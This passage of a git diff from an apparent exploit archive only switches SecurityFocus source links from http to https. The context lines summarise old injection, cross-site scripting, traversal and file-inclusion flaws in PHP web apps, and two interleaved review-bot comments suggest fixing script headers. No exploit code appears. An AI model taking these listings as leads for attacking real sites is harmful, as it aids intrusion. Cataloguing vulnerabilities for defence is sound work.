diff --git a/exploits/php/webapps/24664.txt b/exploits/php/webapps/24664.txt index e3d8bb9cd..153dea708 100644 --- a/exploits/php/webapps/24664.txt +++ b/exploits/php/webapps/24664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11339/info +source: https://www.securityfocus.com/bid/11339/info DCP-Portal is reported prone to multiple HTML injection vulnerabilities. It is reported that DCP-Portal does not sufficiently filter data submitted via input fields in several scripts. diff --git a/exploits/php/webapps/24665.txt b/exploits/php/webapps/24665.txt index 6f2abe375..ad26d6f27 100644 --- a/exploits/php/webapps/24665.txt +++ b/exploits/php/webapps/24665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11340/info +source: https://www.securityfocus.com/bid/11340/info DCP-Portal is reported prone to a HTTP response splitting vulnerability. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled. diff --git a/exploits/php/webapps/24667.txt b/exploits/php/webapps/24667.txt index d5766232a..6bc76c747 100644 --- a/exploits/php/webapps/24667.txt +++ b/exploits/php/webapps/24667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11348/info +source: https://www.securityfocus.com/bid/11348/info Wordpress is reported prone to a HTTP response splitting vulnerability. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled. diff --git a/exploits/php/webapps/24676.txt b/exploits/php/webapps/24676.txt index bee2d16f4..8cf17cdb5 100644 --- a/exploits/php/webapps/24676.txt +++ b/exploits/php/webapps/24676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11392/info +source: https://www.securityfocus.com/bid/11392/info Campus Pipeline is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. 
diff --git a/exploits/php/webapps/24683.txt b/exploits/php/webapps/24683.txt index 825550f26..2fc2b401b 100644 --- a/exploits/php/webapps/24683.txt +++ b/exploits/php/webapps/24683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11415/info +source: https://www.securityfocus.com/bid/11415/info Pinnacle Systems ShowCenter is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24685.txt b/exploits/php/webapps/24685.txt index de053e5f1..24f03f1bd 100644 --- a/exploits/php/webapps/24685.txt +++ b/exploits/php/webapps/24685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11437/info +source: https://www.securityfocus.com/bid/11437/info Reportedly CoolPHP is affected by multiple remote input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input prior to using it to make critical actions. diff --git a/exploits/php/webapps/24689.sh b/exploits/php/webapps/24689.sh index 1ee13f180..834555141 100755 --- a/exploits/php/webapps/24689.sh +++ b/exploits/php/webapps/24689.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11456/info +source: https://www.securityfocus.com/bid/11456/info It is reported that cPanel is susceptible to an information disclosure vulnerability in its function to enable Front Page extensions. diff --git a/exploits/php/webapps/24692.txt b/exploits/php/webapps/24692.txt index 5e4255440..24ccdea6c 100644 --- a/exploits/php/webapps/24692.txt +++ b/exploits/php/webapps/24692.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11463/info +source: https://www.securityfocus.com/bid/11463/info It is reported that Jebuch is susceptible to an HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. 
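Review bot: in the exploits/php/webapps/24689.sh hunk above, line 1 of a mode 100755 shell script is still the bare text `source: https://www.securityfocus.com/bid/11456/info`, followed by unquoted advisory prose in the context lines, so the first four lines are neither a shebang nor comments. Since this change already touches that line, consider writing it as `# source: https://www.securityfocus.com/bid/11456/info` and commenting out the description lines too, or drop the executable bit if the file is meant to be read rather than run.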
diff --git a/exploits/php/webapps/24697.txt b/exploits/php/webapps/24697.txt index bad5f3174..7f3b84cb7 100644 --- a/exploits/php/webapps/24697.txt +++ b/exploits/php/webapps/24697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11497/info +source: https://www.securityfocus.com/bid/11497/info Serendipity is reported prone to an HTTP response splitting vulnerability. diff --git a/exploits/php/webapps/24698.txt b/exploits/php/webapps/24698.txt index efc475255..d6f97ba87 100644 --- a/exploits/php/webapps/24698.txt +++ b/exploits/php/webapps/24698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11502/info +source: https://www.securityfocus.com/bid/11502/info It is reported that UBBCentral UBB.threads is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. diff --git a/exploits/php/webapps/24702.txt b/exploits/php/webapps/24702.txt index 6665cc74d..89a8d721f 100644 --- a/exploits/php/webapps/24702.txt +++ b/exploits/php/webapps/24702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11516/info +source: https://www.securityfocus.com/bid/11516/info MoniWiki is reported prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied URI input before including it in dynamic web page content. diff --git a/exploits/php/webapps/24718.txt b/exploits/php/webapps/24718.txt index 17df2d48a..75191c92c 100644 --- a/exploits/php/webapps/24718.txt +++ b/exploits/php/webapps/24718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11587/info +source: https://www.securityfocus.com/bid/11587/info It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24719.txt b/exploits/php/webapps/24719.txt index 645980e6d..9ec8b03c6 100644 
--- a/exploits/php/webapps/24719.txt +++ b/exploits/php/webapps/24719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11587/info +source: https://www.securityfocus.com/bid/11587/info It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24729.txt b/exploits/php/webapps/24729.txt index d6f386145..6ec00fad7 100644 --- a/exploits/php/webapps/24729.txt +++ b/exploits/php/webapps/24729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11651/info +source: https://www.securityfocus.com/bid/11651/info Multiple remote vulnerabilities are reported to exist in WebCalendar. diff --git a/exploits/php/webapps/24731.txt b/exploits/php/webapps/24731.txt index 891791b4b..0d36e35cc 100644 --- a/exploits/php/webapps/24731.txt +++ b/exploits/php/webapps/24731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11654/info +source: https://www.securityfocus.com/bid/11654/info Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks. diff --git a/exploits/php/webapps/24732.txt b/exploits/php/webapps/24732.txt index ecacbe29f..8e80988b8 100644 --- a/exploits/php/webapps/24732.txt +++ b/exploits/php/webapps/24732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11660/info +source: https://www.securityfocus.com/bid/11660/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. diff --git a/exploits/php/webapps/24734.txt b/exploits/php/webapps/24734.txt index 010d058a1..a0be6a9a9 100644 --- a/exploits/php/webapps/24734.txt +++ b/exploits/php/webapps/24734.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11671/info +source: https://www.securityfocus.com/bid/11671/info Private Message System is reported prone to multiple vulnerabilities that can allow remote attackers to carry out cross-site scripting attacks and disclose arbitrary private messages. diff --git a/exploits/php/webapps/24735.txt b/exploits/php/webapps/24735.txt index cce5c2ce6..fba7ef201 100644 --- a/exploits/php/webapps/24735.txt +++ b/exploits/php/webapps/24735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11671/info +source: https://www.securityfocus.com/bid/11671/info Private Message System is reported prone to multiple vulnerabilities that can allow remote attackers to carry out cross-site scripting attacks and disclose arbitrary private messages. diff --git a/exploits/php/webapps/24736.txt b/exploits/php/webapps/24736.txt index 776b822a2..c3bb33f73 100644 --- a/exploits/php/webapps/24736.txt +++ b/exploits/php/webapps/24736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11673/info +source: https://www.securityfocus.com/bid/11673/info A remote HTTP response splitting vulnerability reportedly affects phpWebSite in its user module. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24737.txt b/exploits/php/webapps/24737.txt index 7cadd09dc..d52cd386d 100644 --- a/exploits/php/webapps/24737.txt +++ b/exploits/php/webapps/24737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11676/info +source: https://www.securityfocus.com/bid/11676/info It is reported that Thefacebook is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24739.txt b/exploits/php/webapps/24739.txt index 3456b321c..d16dfb05d 100644 --- a/exploits/php/webapps/24739.txt +++ b/exploits/php/webapps/24739.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11681/info +source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24748.txt b/exploits/php/webapps/24748.txt index 80e957d3c..71a1ab89e 100644 --- a/exploits/php/webapps/24748.txt +++ b/exploits/php/webapps/24748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11693/info +source: https://www.securityfocus.com/bid/11693/info Event Calendar is prone to multiple input validation vulnerabilities. These issues include HTML injection and cross-site scripting. The following specific vulnerabilities were reported: diff --git a/exploits/php/webapps/24751.pl b/exploits/php/webapps/24751.pl index 7b7be2447..e219311ea 100755 --- a/exploits/php/webapps/24751.pl +++ b/exploits/php/webapps/24751.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11701/info +source: https://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB Cash_Mod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/24752.txt b/exploits/php/webapps/24752.txt index 6eb16b8ef..aa60d4266 100644 --- a/exploits/php/webapps/24752.txt +++ b/exploits/php/webapps/24752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11703/info +source: https://www.securityfocus.com/bid/11703/info A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query. diff --git a/exploits/php/webapps/24759.txt b/exploits/php/webapps/24759.txt index 0bb14c5c3..18184cc4f 100644 --- a/exploits/php/webapps/24759.txt +++ b/exploits/php/webapps/24759.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11719/info +source: https://www.securityfocus.com/bid/11719/info A remote SQL injection vulnerability reportedly affects ipbProArcade. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24762.txt b/exploits/php/webapps/24762.txt index 7796c952a..fcfbd2d47 100644 --- a/exploits/php/webapps/24762.txt +++ b/exploits/php/webapps/24762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11725/info +source: https://www.securityfocus.com/bid/11725/info It is reported that PHPKIT is susceptible to cross-site scripting and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/24766.txt b/exploits/php/webapps/24766.txt index 2fb97c8bb..2534f1c79 100644 --- a/exploits/php/webapps/24766.txt +++ b/exploits/php/webapps/24766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11733/info +source: https://www.securityfocus.com/bid/11733/info NuKed-Klan 'submit URI link' function is reported prone to a HTML injection vulnerability. It is reported that the issue exists due to a lack of sufficient input validation performed on the 'website name' input field of the NuKed-Klan submit URI link form. diff --git a/exploits/php/webapps/24768.txt b/exploits/php/webapps/24768.txt index 025a3e001..2b02d17d3 100644 --- a/exploits/php/webapps/24768.txt +++ b/exploits/php/webapps/24768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11740/info +source: https://www.securityfocus.com/bid/11740/info SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL injection and directory traversal attacks. diff --git a/exploits/php/webapps/24769.txt b/exploits/php/webapps/24769.txt index 44d1bf1e2..c2c2c26ee 100644 
--- a/exploits/php/webapps/24769.txt +++ b/exploits/php/webapps/24769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11740/info +source: https://www.securityfocus.com/bid/11740/info SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL injection and directory traversal attacks. diff --git a/exploits/php/webapps/24771.txt b/exploits/php/webapps/24771.txt index c0c0d3c47..51b5ce5ec 100644 --- a/exploits/php/webapps/24771.txt +++ b/exploits/php/webapps/24771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11744/info +source: https://www.securityfocus.com/bid/11744/info A vulnerability is reported in the KorWeblog software that may allow a remote user to disclose directory listings. diff --git a/exploits/php/webapps/24772.txt b/exploits/php/webapps/24772.txt index 418468346..ff4c073f3 100644 --- a/exploits/php/webapps/24772.txt +++ b/exploits/php/webapps/24772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11745/info +source: https://www.securityfocus.com/bid/11745/info It is reported that Zwiki is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamic web page content. diff --git a/exploits/php/webapps/24782.txt b/exploits/php/webapps/24782.txt index e7b2dc396..e60dbcfa6 100644 --- a/exploits/php/webapps/24782.txt +++ b/exploits/php/webapps/24782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11765/info +source: https://www.securityfocus.com/bid/11765/info It is reported that phpCMS is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web pages. 
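Review bot: the exploits/php/webapps/24751.pl hunk above rewrites the URL on line 1 of a mode 100755 Perl file but leaves `source: https://www.securityfocus.com/bid/11701/info` and the description that follows as plain text rather than `#` comments or a POD block. A bulk scheme rewrite is a good moment to normalise these headers in script files, for example `# source: https://www.securityfocus.com/bid/11701/info`, so the provenance line stays greppable and the file header is valid for its declared language.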
diff --git a/exploits/php/webapps/24783.txt b/exploits/php/webapps/24783.txt index b3a4d4782..5ef2b0aa6 100644 --- a/exploits/php/webapps/24783.txt +++ b/exploits/php/webapps/24783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11767/info +source: https://www.securityfocus.com/bid/11767/info pnTresMailer is reported susceptible to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/24796.txt b/exploits/php/webapps/24796.txt index 59297fb9f..2e7682a03 100644 --- a/exploits/php/webapps/24796.txt +++ b/exploits/php/webapps/24796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11795/info +source: https://www.securityfocus.com/bid/11795/info It is reported that Blog Torrent is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied input. diff --git a/exploits/php/webapps/24797.txt b/exploits/php/webapps/24797.txt index 4c3812bed..05416134e 100644 --- a/exploits/php/webapps/24797.txt +++ b/exploits/php/webapps/24797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11798/info +source: https://www.securityfocus.com/bid/11798/info It is reported that Advanced Guestbook is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24798.txt b/exploits/php/webapps/24798.txt index 64d21d366..cf5b24bb4 100644 --- a/exploits/php/webapps/24798.txt +++ b/exploits/php/webapps/24798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11817/info +source: https://www.securityfocus.com/bid/11817/info paFileDB is prone to an installation path disclosure. If invalid requests are made to certain scripts, the installation path is included in the returned error message. 
diff --git a/exploits/php/webapps/24803.txt b/exploits/php/webapps/24803.txt index ac644e6f1..3ebd966cf 100644 --- a/exploits/php/webapps/24803.txt +++ b/exploits/php/webapps/24803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11839/info +source: https://www.securityfocus.com/bid/11839/info It is reported that Blog Torrent is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24806.txt b/exploits/php/webapps/24806.txt index f6f03bd46..2de10a28e 100644 --- a/exploits/php/webapps/24806.txt +++ b/exploits/php/webapps/24806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11848/info +source: https://www.securityfocus.com/bid/11848/info It is reported that WebLibs is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly filter user-supplied input. diff --git a/exploits/php/webapps/24810.txt b/exploits/php/webapps/24810.txt index 161262a09..39efae424 100644 --- a/exploits/php/webapps/24810.txt +++ b/exploits/php/webapps/24810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11868/info +source: https://www.securityfocus.com/bid/11868/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24814.txt b/exploits/php/webapps/24814.txt index a3bc25af3..85a1a838a 100644 --- a/exploits/php/webapps/24814.txt +++ b/exploits/php/webapps/24814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11880/info +source: https://www.securityfocus.com/bid/11880/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. 
diff --git a/exploits/php/webapps/24816.txt b/exploits/php/webapps/24816.txt index 760f58092..21ca3caee 100644 --- a/exploits/php/webapps/24816.txt +++ b/exploits/php/webapps/24816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11882/info +source: https://www.securityfocus.com/bid/11882/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24817.txt b/exploits/php/webapps/24817.txt index edbac9cdc..70f17375e 100644 --- a/exploits/php/webapps/24817.txt +++ b/exploits/php/webapps/24817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11886/info +source: https://www.securityfocus.com/bid/11886/info phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/24819.txt b/exploits/php/webapps/24819.txt index 532fe8b3f..d92c00511 100644 --- a/exploits/php/webapps/24819.txt +++ b/exploits/php/webapps/24819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11888/info +source: https://www.securityfocus.com/bid/11888/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24820.txt b/exploits/php/webapps/24820.txt index ff868bbc9..cd3f6d130 100644 --- a/exploits/php/webapps/24820.txt +++ b/exploits/php/webapps/24820.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11890/info +source: https://www.securityfocus.com/bid/11890/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24821.txt b/exploits/php/webapps/24821.txt index 420f909b8..78cf85887 100644 --- a/exploits/php/webapps/24821.txt +++ b/exploits/php/webapps/24821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11891/info +source: https://www.securityfocus.com/bid/11891/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24822.txt b/exploits/php/webapps/24822.txt index 1586ea139..e7c9a4501 100644 --- a/exploits/php/webapps/24822.txt +++ b/exploits/php/webapps/24822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11894/info +source: https://www.securityfocus.com/bid/11894/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24823.txt b/exploits/php/webapps/24823.txt index fa79e3f25..7f34c41eb 100644 --- a/exploits/php/webapps/24823.txt +++ b/exploits/php/webapps/24823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11896/info +source: https://www.securityfocus.com/bid/11896/info Multiple remote vulnerabilities are reported to exist in SugarSales. diff --git a/exploits/php/webapps/24824.txt b/exploits/php/webapps/24824.txt index 91ec76b07..1c4dbd998 100644 --- a/exploits/php/webapps/24824.txt +++ b/exploits/php/webapps/24824.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24825.txt b/exploits/php/webapps/24825.txt index 664af48af..c568b4e73 100644 --- a/exploits/php/webapps/24825.txt +++ b/exploits/php/webapps/24825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24826.txt b/exploits/php/webapps/24826.txt index 1fbe69378..66e057148 100644 --- a/exploits/php/webapps/24826.txt +++ b/exploits/php/webapps/24826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24827.txt b/exploits/php/webapps/24827.txt index a0ef32329..b75baf455 100644 --- a/exploits/php/webapps/24827.txt +++ b/exploits/php/webapps/24827.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24829.txt b/exploits/php/webapps/24829.txt index 90463bbcf..1baf4e9a4 100644 --- a/exploits/php/webapps/24829.txt +++ b/exploits/php/webapps/24829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11903/info +source: https://www.securityfocus.com/bid/11903/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24830.txt b/exploits/php/webapps/24830.txt index 7fc437989..0e5a3e696 100644 --- a/exploits/php/webapps/24830.txt +++ b/exploits/php/webapps/24830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11904/info +source: https://www.securityfocus.com/bid/11904/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24831.txt b/exploits/php/webapps/24831.txt index 9549694e7..fb8668b4f 100644 --- a/exploits/php/webapps/24831.txt +++ b/exploits/php/webapps/24831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11905/info +source: https://www.securityfocus.com/bid/11905/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24832.txt b/exploits/php/webapps/24832.txt index e61102152..f25ab6bf0 100644 --- a/exploits/php/webapps/24832.txt 
+++ b/exploits/php/webapps/24832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11906/info +source: https://www.securityfocus.com/bid/11906/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24834.txt b/exploits/php/webapps/24834.txt index 2d920c83e..c41c78bdc 100644 --- a/exploits/php/webapps/24834.txt +++ b/exploits/php/webapps/24834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11907/info +source: https://www.securityfocus.com/bid/11907/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24835.txt b/exploits/php/webapps/24835.txt index c1590f538..25c96c70a 100644 --- a/exploits/php/webapps/24835.txt +++ b/exploits/php/webapps/24835.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11910/info +source: https://www.securityfocus.com/bid/11910/info It is reported that PhpGedView is susceptible to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24837.txt b/exploits/php/webapps/24837.txt index 18fb442e0..95115ae6e 100644 --- a/exploits/php/webapps/24837.txt +++ b/exploits/php/webapps/24837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11925/info +source: https://www.securityfocus.com/bid/11925/info It is reported that PhpGedView is susceptible to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24842.txt b/exploits/php/webapps/24842.txt index e6dbddb39..b933ac3cf 100644 
--- a/exploits/php/webapps/24842.txt +++ b/exploits/php/webapps/24842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11946/info +source: https://www.securityfocus.com/bid/11946/info iWebNegar is reported prone to multiple SQL injection vulnerabilities, these issues exist due to a lack of sufficient boundary checks performed on user-supplied URI parameter data. diff --git a/exploits/php/webapps/24844.txt b/exploits/php/webapps/24844.txt index 9a2021de8..6d5a9c9f7 100644 --- a/exploits/php/webapps/24844.txt +++ b/exploits/php/webapps/24844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24845.txt b/exploits/php/webapps/24845.txt index 92863188e..63bdc76d8 100644 --- a/exploits/php/webapps/24845.txt +++ b/exploits/php/webapps/24845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24846.txt b/exploits/php/webapps/24846.txt index 251e38a0b..5d2b9f95c 100644 --- a/exploits/php/webapps/24846.txt +++ b/exploits/php/webapps/24846.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24847.txt b/exploits/php/webapps/24847.txt index a07d78467..aa5198aba 100644 --- a/exploits/php/webapps/24847.txt +++ b/exploits/php/webapps/24847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24987.txt b/exploits/php/webapps/24987.txt index b59bb9b65..b2d8f1234 100644 --- a/exploits/php/webapps/24987.txt +++ b/exploits/php/webapps/24987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11983/info +source: https://www.securityfocus.com/bid/11983/info JSBoard is reported prone to a vulnerability that can allow a remote attacker to upload arbitrary PHP scripts to a vulnerable server. This issue results from insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/24988.txt b/exploits/php/webapps/24988.txt index cd1fa87d3..b918ec735 100644 --- a/exploits/php/webapps/24988.txt +++ b/exploits/php/webapps/24988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. 
diff --git a/exploits/php/webapps/24989.txt b/exploits/php/webapps/24989.txt index 403087c1c..6995b6681 100644 --- a/exploits/php/webapps/24989.txt +++ b/exploits/php/webapps/24989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24990.txt b/exploits/php/webapps/24990.txt index c8bd23f6d..1f3276edd 100644 --- a/exploits/php/webapps/24990.txt +++ b/exploits/php/webapps/24990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24991.txt b/exploits/php/webapps/24991.txt index 0de27976b..4000f6b0c 100644 --- 